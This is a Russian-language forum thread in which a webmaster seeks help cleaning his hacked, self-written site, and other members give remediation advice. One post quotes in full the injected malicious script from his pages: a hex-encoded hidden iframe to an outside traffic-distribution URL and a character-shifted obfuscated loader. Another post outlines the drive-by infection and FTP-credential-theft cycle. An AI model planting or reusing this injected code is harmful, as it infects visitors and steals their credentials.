Web-вирусы. iframe

Статус
В этой теме нельзя размещать новые ответы.

Juri

Мой дом здесь!
Регистрация
5 Окт 2007
Сообщения
1.064
Реакции
200
  • Заблокирован
  • #11
вы мне лучше скажите как от этого сайт теперь избавить?

сегодня проверился касперским с новыми базами нашол около 20 троянчиков в кэше оперы. все почистил и удалил(

но что делать с сайтом?
 

Nektov

Гуру форума
Регистрация
4 Авг 2006
Сообщения
312
Реакции
85
Для просмотра ссылки Войди или Зарегистрируйся
Закрыть **х.:-] Меньше геморроя будет :D

А если по сути.
Проверь не ломанули ли хостера. (пройдись по другим сайтам хостера, желательно на том же сервере). Если ломанули - меняй.
И как уже говорили, меняй всё и вся (пасы и тд.)

Также посмотри сайт на возможность заражения (шел скул инъекция).

Что у тя за двиг ? Дай адрес сайта.
 

prokopa

Постоялец
Регистрация
27 Июн 2007
Сообщения
400
Реакции
111
помню один раз пришлось тоже вычислять бажных соседей и латать их дырку :)
попробуй, может тоже поможет.
 

Juri

Мой дом здесь!
Регистрация
5 Окт 2007
Сообщения
1.064
Реакции
200
  • Заблокирован
  • #14
двг? он самописный если это двигом можно назвать, давно этим сайтом не занимался но вот щас опять решил поднять. адрес вот
а если сменить все пароли убить все на серваке а потом по новой залить это опможет?
 

Nektov

Гуру форума
Регистрация
4 Авг 2006
Сообщения
312
Реакции
85
Чё у тя за хорень
<script>if(document.cookie.indexOf('tnd=on')==-1){expires=new Date();expires.setTime(expires.getTime()+86400000);document.cookie='tnd='+escape('on')+'; expires='+expires.toGMTString()+'; path=/';status=location;document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%75%70%64%61%74%65%7a%2e%69%6e%66%6f%2f%65%74%63%2f%74%64%73%2e%70%68%70%22%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%20%6f%6e%4c%6f%61%64%3d%22%73%74%61%74%75%73%3d%64%65%66%61%75%6c%74%53%74%61%74%75%73%3b%22%3e%3c%2f%69%66%72%61%6d%65%3e'));}</script><script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&41&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3d&44&43&3d&42&42&49&3d&4:&48&3d&42&42&45&3d&44&43&3d&49&44&3d&42&42&47&3d&42&42&45&3d&47&42&3d&44&45&3d&44&4:&3d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d&42&41&45&3d&42&42&47&3d&47&42&3d&44&4:&3d&45&4:&3d&44&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&4:&3d&42&42&49&3d&42&41&46&3d&42&42&46&3d&42&41&46&3d&4:&49&3d&42&41&46&3d&42&41&49&3d&42&41&46&3d&42&42&47&3d&42&43&42&3d&46&49&3d&44&43&3d&42&41&45&3d&42&41&46&3d&42&41&41&3d&42&41&41&3d&42&41&42&3d&42&42&41&3d&46&4:&3d&44&4:&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&44&43&3d&44&43&3d&47&41&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42&3d&44&4:&3d&42&41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d&45&48&3d&42&42&46&3d&42&42&42&3d&4:&4:&3d&42&41&48&3d&42&42&46&3d&46&43&3d&45&46&3d&46&44&3d&45&47&3d&4:&49&3d&42&41&46&3d&42&43&43&3d&45&48&3d&42&41&46&3d&42&42&41&3d&42&41&41&3d&42&41&42&3d&42&43&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&44&4:&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d&47&42&3d&44&4:&3d&45&4:&3d&44&45&3d&42&44&3d&42&41&3d&42&41&41&3d&42&42&42&3d&4:&4:&3d&42&42&48&3d&42&41&4:&3d&42&41&42&3d&42&42&41&3d&42&42&47&3d&45&47&3d&42&42&4:&3d&42&42&45&3d&42&41&46&3d&42&42&47&3d&42&41&42&3d&45&41&3d&49&44&3d&42&42&47&3d&42&42&45&3d&45&47&3d&42&42&46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&3d&42&42&45&3d&42&41&46&3d&42&42&41&3d&42&41&44&3d&45&41&3d&46&44&3d&46&41&3d&45&45&3d&45&4:&3d&45&49&3d&46&44&3d&45&42&3d&45&45&3d&49&44&3d&42&42&47&3d&42&42&45&3d&45&47&3d&42&42&46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&3d&42&42&45&3d&42&41&46&3d&42&42&41&3d&42&41&44&3d&45&41&3d&45&49&3d&45&45&3d&46&44&3d&46&41&3d&45&42&3d&45&42&3d&44&43&3d&47&41&3d&45&48&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
Это все твои фреймы ?


Убить свё :nezn: незнаю. Мне кажется, у тя дыры есть.
Будет время поищу, отпишусь.
А пароли можешь сменить. Только если есть дыры все равно сопрут.

Гы: Для просмотра ссылки Войди или Зарегистрируйся
 

almaz

Гуру форума
Регистрация
11 Ноя 2006
Сообщения
334
Реакции
75
двг? он самописный если это двигом можно назвать, давно этим сайтом не занимался но вот щас опять решил поднять. адрес вот *** скрытое содержание ***
а если сменить все пароли убить все на серваке а потом по новой залить это опможет?
Мне это помогло снес все вместе сPanel,все заново установил и поменял все пароли.
 

Juri

Мой дом здесь!
Регистрация
5 Окт 2007
Сообщения
1.064
Реакции
200
  • Заблокирован
  • #17
Чё у тя за хорень
Это все твои фреймы ?
*** скрытое содержание ***

Убить свё :nezn: незнаю. Мне кажется, у тя дыры есть.
Будет время поищу, отпишусь.
А пароли можешь сменить. Только если есть дыры все равно сопрут.

Гы: Для просмотра ссылки Войди или Зарегистрируйся


что касаеться этой херни то это не мое.
что касаеться дыр, возможно, так как я тогда был совсем сырым програмером...
что касаеться фото это не мое... мое другое..)))
буду рад если поищешь дыры и отпишешься только в личку желательно )
 

REALiSTiC

Постоялец
Регистрация
30 Мар 2006
Сообщения
353
Реакции
138
1) Вы заходите на страницу с ифреймом.
2) Вас пробивает эксплоит
3) Грузится и запускается трой
4) Трой отсылает отсчеты (пароли, etc) на сервак хозяина
5) Отсчеты парсятся, выбираются фтп
6) Фтп загоняются в ифреймер, который ставит линки на сплоит
7) Goto: 1)

:D
 

lobzik

Гуру форума
Регистрация
8 Авг 2006
Сообщения
311
Реакции
77
Вобщем, меняй все пароли. Тот код что был приведен и есть код эксплойта, который подгружает трой. Не юзай ie, юзай operа или ff и будет тебе счастье... ну антивирь и фаер самособой... И не забудь почистить страницы (обычно только индексевые) от левого ява-скрипта, который будет наверняка где то в конце кода.
 

REALiSTiC

Постоялец
Регистрация
30 Мар 2006
Сообщения
353
Реакции
138
Вобщем, меняй все пароли.

Так делают только дауны...
После того как сменишь, отсчет будет оправлен еще раз.

100% поможет только переустановка ОС...
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху